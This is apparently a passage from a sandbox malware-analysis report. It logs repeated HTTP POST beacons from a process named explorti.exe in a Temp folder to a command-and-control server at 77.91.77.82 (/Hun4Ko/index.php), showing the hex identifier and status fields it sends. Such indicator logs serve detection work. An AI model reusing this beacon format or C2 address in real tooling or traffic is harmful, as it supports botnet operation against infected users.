                                                                Date: Fri, 05 Jul 2024 02:24:24 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                83192.168.2.44982677.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:24.799483061 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:25.516391039 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                84192.168.2.44982777.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:25.637386084 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:26.332293987 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:26 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                85192.168.2.44982877.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:26.340352058 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:27.054806948 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:26 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                86192.168.2.44982977.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:27.168741941 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:27.889110088 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:27 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                87192.168.2.44983077.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:27.897255898 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:28.591114998 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:28 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                88192.168.2.44983177.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:28.715435982 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:29.409796000 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:29 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                89192.168.2.44983277.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:29.418656111 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:30.143394947 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:30 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                90192.168.2.44983377.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:30.263017893 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:30.953406096 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:30 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                91192.168.2.44983477.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:30.961163998 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:31.782732964 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                92192.168.2.44983577.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:31.904164076 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:32.604990959 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:32 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                93192.168.2.44983677.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:32.616256952 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:33.313956976 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:33 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                94192.168.2.44983777.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:33.435595036 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:34.128731012 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:34 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                95192.168.2.44983877.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:34.156503916 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:34.866027117 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:34 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                96192.168.2.44983977.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:34.981031895 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:35.705519915 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:35 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                97192.168.2.44984077.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:35.717950106 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                98192.168.2.44984177.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:36.153212070 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:36.845216036 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                99192.168.2.44984277.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:36.854208946 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:37.578236103 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:37 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                100192.168.2.44984377.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:37.699867964 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:38.408246994 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:38 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                101192.168.2.44984477.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:38.416889906 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:39.135279894 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:39 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                102192.168.2.44984577.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:39.246499062 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:39.947231054 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:39 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                103192.168.2.44984677.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:39.955507994 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:40.655013084 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:40 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                104192.168.2.44984777.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
